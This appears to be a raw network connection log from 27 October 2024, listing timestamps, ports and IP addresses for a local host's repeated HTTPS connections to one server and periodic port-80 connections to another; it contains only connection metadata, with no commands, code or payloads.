Oct 27, 2024 17:11:49.913204908 CET	57980	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.913233995 CET	57980	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.913351059 CET	57980	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.913381100 CET	443	57980	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.913405895 CET	57980	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.913419008 CET	443	57980	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.916152000 CET	57985	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.916240931 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.916333914 CET	57985	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.916445971 CET	57985	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.916462898 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.916548014 CET	443	57982	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.916614056 CET	443	57982	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.916681051 CET	57982	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.916697979 CET	443	57982	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.916738987 CET	443	57982	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.916779995 CET	57982	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.916779995 CET	57982	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.916810036 CET	443	57982	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.916836023 CET	57982	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.916845083 CET	443	57982	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.918535948 CET	57986	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.918576956 CET	443	57986	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.918648958 CET	57986	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.918744087 CET	57986	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.918756962 CET	443	57986	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.921461105 CET	443	57981	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.921521902 CET	443	57981	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.921586990 CET	57981	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.921648026 CET	57981	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.921648026 CET	57981	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.921681881 CET	443	57981	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.921705961 CET	443	57981	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.923343897 CET	57987	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.923367977 CET	443	57987	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.923451900 CET	57987	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.923552990 CET	57987	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.923578024 CET	443	57987	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.941309929 CET	443	57984	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.941361904 CET	443	57984	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.941414118 CET	57984	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.941431999 CET	443	57984	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.941479921 CET	443	57984	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.941521883 CET	57984	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.941584110 CET	57984	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.941597939 CET	443	57984	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.941607952 CET	57984	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.941612959 CET	443	57984	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.943310022 CET	57988	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.943371058 CET	443	57988	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.943449974 CET	57988	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.943553925 CET	57988	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.943577051 CET	443	57988	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.047853947 CET	443	57983	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.047875881 CET	443	57983	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.047894955 CET	443	57983	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.048012972 CET	57983	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.048012972 CET	57983	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.048098087 CET	443	57983	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.048172951 CET	57983	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.049336910 CET	443	57983	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.049396038 CET	443	57983	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.049411058 CET	57983	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.049438953 CET	57983	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.049474955 CET	57983	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.049508095 CET	443	57983	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.049551964 CET	57983	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.049566984 CET	443	57983	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.051301956 CET	57989	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.051361084 CET	443	57989	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.051450014 CET	57989	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.051561117 CET	57989	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.051575899 CET	443	57989	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.669986963 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.670640945 CET	57985	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.670686960 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.671118975 CET	57985	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.671133041 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.673831940 CET	443	57988	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.674139977 CET	57988	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.674200058 CET	443	57988	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.674396992 CET	57988	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.674427032 CET	443	57988	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.675698042 CET	443	57987	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.675908089 CET	57987	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.675926924 CET	443	57987	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.676196098 CET	57987	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.676207066 CET	443	57987	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.691617012 CET	443	57986	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.692249060 CET	57986	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.692265034 CET	443	57986	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.692626953 CET	57986	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.692631960 CET	443	57986	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.802448034 CET	443	57988	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.802592993 CET	443	57988	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.802659988 CET	57988	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.802791119 CET	57988	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.802826881 CET	443	57988	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.802851915 CET	57988	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.802866936 CET	443	57988	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.808449984 CET	443	57987	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.808474064 CET	443	57987	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.808549881 CET	443	57987	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.808582067 CET	57987	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.808621883 CET	57987	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.810934067 CET	57987	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.810935020 CET	57987	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.810971022 CET	443	57987	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.810995102 CET	443	57987	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.828169107 CET	57990	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.828226089 CET	443	57990	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.828304052 CET	57990	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.828586102 CET	57990	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.828630924 CET	443	57990	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.829106092 CET	57991	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.829157114 CET	443	57991	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.829221964 CET	57991	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.829323053 CET	57991	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.829350948 CET	443	57991	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.830123901 CET	443	57986	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.830189943 CET	443	57986	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.830255985 CET	57986	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.830265045 CET	443	57986	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.830305099 CET	57986	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.830315113 CET	443	57986	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.830364943 CET	57986	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.830425024 CET	57986	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.830435038 CET	443	57986	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.830445051 CET	57986	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.830450058 CET	443	57986	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.832215071 CET	57992	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.832252979 CET	443	57992	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.832315922 CET	57992	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.832412004 CET	57992	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.832427025 CET	443	57992	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.922555923 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.922626019 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.922668934 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.922822952 CET	57985	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.922823906 CET	57985	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:50.922853947 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:50.922924995 CET	57985	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.042320967 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.042387962 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.042416096 CET	57985	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.042433023 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.042463064 CET	57985	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.042486906 CET	57985	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.042499065 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.042582035 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.042639971 CET	57985	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.042829037 CET	57985	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.042850018 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.042871952 CET	57985	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.042886019 CET	443	57985	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.062000990 CET	57993	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.062081099 CET	443	57993	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.062170982 CET	57993	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.068334103 CET	57993	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.068383932 CET	443	57993	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.303878069 CET	57979	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:51.304189920 CET	57994	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:51.465958118 CET	80	57994	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:51.466136932 CET	57994	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:51.466300964 CET	57994	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:51.467067957 CET	80	57979	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:51.467158079 CET	57979	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:51.473256111 CET	80	57994	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:51.597634077 CET	443	57990	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.598982096 CET	57990	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.599045038 CET	443	57990	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.599647045 CET	57990	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.599661112 CET	443	57990	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.601443052 CET	443	57992	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.601880074 CET	57992	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.601907969 CET	443	57992	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.602745056 CET	57992	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.602750063 CET	443	57992	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.663511038 CET	443	57991	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.664143085 CET	57991	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.664180040 CET	443	57991	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.664699078 CET	57991	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.664710999 CET	443	57991	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.728039026 CET	443	57990	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.728108883 CET	443	57990	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.728281021 CET	57990	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.728527069 CET	57990	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.728574038 CET	443	57990	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.728601933 CET	57990	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.728619099 CET	443	57990	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.732172966 CET	57995	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.732217073 CET	443	57995	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.732322931 CET	57995	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.732497931 CET	57995	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.732523918 CET	443	57995	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.732700109 CET	443	57992	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.732759953 CET	443	57992	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.732815027 CET	57992	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.732830048 CET	443	57992	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.732872963 CET	443	57992	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.732928038 CET	57992	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.732963085 CET	57992	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.732963085 CET	57992	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.732975006 CET	443	57992	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.732983112 CET	443	57992	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.735517979 CET	57996	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.735557079 CET	443	57996	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.735637903 CET	57996	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.735814095 CET	57996	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.735832930 CET	443	57996	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.794881105 CET	443	57991	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.795018911 CET	443	57991	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.795087099 CET	57991	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.795183897 CET	57991	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.795211077 CET	443	57991	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.795234919 CET	57991	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.795248985 CET	443	57991	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.797535896 CET	57997	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.797594070 CET	443	57997	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.797697067 CET	57997	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.797904015 CET	57997	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.797940016 CET	443	57997	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.801613092 CET	443	57989	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.801968098 CET	57989	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.801985025 CET	443	57989	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.802346945 CET	57989	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.802356958 CET	443	57989	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.807573080 CET	443	57993	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.807873964 CET	57993	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.807897091 CET	443	57993	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.808216095 CET	57993	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.808228016 CET	443	57993	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.931936979 CET	443	57989	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.932143927 CET	443	57989	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.932209969 CET	57989	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.932261944 CET	57989	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.932261944 CET	57989	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.932290077 CET	443	57989	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.932310104 CET	443	57989	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.937310934 CET	443	57993	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.937454939 CET	443	57993	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.937517881 CET	57993	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.937576056 CET	57993	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.937576056 CET	57993	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:51.937611103 CET	443	57993	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:51.937635899 CET	443	57993	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.348561049 CET	80	57994	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:52.348825932 CET	57994	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:52.470648050 CET	443	57996	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.471087933 CET	57996	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.471101999 CET	443	57996	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.471539974 CET	57996	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.471544981 CET	443	57996	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.480633020 CET	443	57995	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.480988979 CET	57995	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.481034040 CET	443	57995	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.481332064 CET	57995	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.481343985 CET	443	57995	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.533518076 CET	443	57997	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.533941031 CET	57997	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.533973932 CET	443	57997	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.534320116 CET	57997	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.534332991 CET	443	57997	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.600220919 CET	443	57996	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.600378036 CET	443	57996	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.600447893 CET	57996	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.600647926 CET	57996	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.600657940 CET	443	57996	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.600667953 CET	57996	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.600672960 CET	443	57996	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.617356062 CET	443	57995	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.617439032 CET	443	57995	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.617531061 CET	57995	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.617619991 CET	57995	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.617649078 CET	443	57995	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.617701054 CET	57995	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.617717028 CET	443	57995	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.672517061 CET	443	57997	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.672684908 CET	443	57997	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.672760963 CET	57997	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.672879934 CET	57997	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.672879934 CET	57997	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:52.672928095 CET	443	57997	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:52.672954082 CET	443	57997	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:53.850694895 CET	57994	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:53.850997925 CET	57998	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:53.856435061 CET	80	57998	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:53.856549978 CET	57998	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:53.856636047 CET	80	57994	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:53.856777906 CET	57998	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:53.856780052 CET	57994	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:53.862143993 CET	80	57998	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:54.997221947 CET	80	57998	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:54.997339010 CET	57998	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:54.999809027 CET	80	57998	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:54.999877930 CET	57998	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:56.622447014 CET	57998	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:56.623209953 CET	57999	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:56.628314972 CET	80	57998	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:56.628367901 CET	57998	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:56.628598928 CET	80	57999	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:56.628686905 CET	57999	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:56.628777027 CET	57999	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:56.634058952 CET	80	57999	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:57.533793926 CET	80	57999	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:57.533907890 CET	57999	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:59.038259029 CET	57999	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:59.038501978 CET	58000	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:59.044090986 CET	80	58000	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:59.044167042 CET	58000	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:59.044260979 CET	58000	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:59.044605017 CET	80	57999	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:59.044672012 CET	57999	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:59.049808025 CET	80	58000	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:59.950566053 CET	80	58000	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:59.950645924 CET	58000	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:01.602781057 CET	58000	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:01.603101015 CET	58001	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:01.608552933 CET	80	58001	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:01.608630896 CET	58001	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:01.608724117 CET	80	58000	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:01.608752966 CET	58001	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:01.608773947 CET	58000	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:01.614116907 CET	80	58001	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:02.503149986 CET	80	58001	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:02.503242970 CET	58001	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:04.022700071 CET	58001	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:04.022985935 CET	58002	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:04.028824091 CET	80	58002	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:04.028918028 CET	80	58001	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:04.028928041 CET	58002	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:04.028976917 CET	58001	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:04.029129982 CET	58002	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:04.034611940 CET	80	58002	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:04.953649998 CET	80	58002	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:04.953737974 CET	58002	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:06.587407112 CET	58002	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:06.587718964 CET	58003	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:12:06.593466997 CET	80	58002	152.89.198.124	192.168.2.4
Oct 27, 2024 17:12:06.593745947 CET	80	58003	152.89.198.124	192.168.2.4
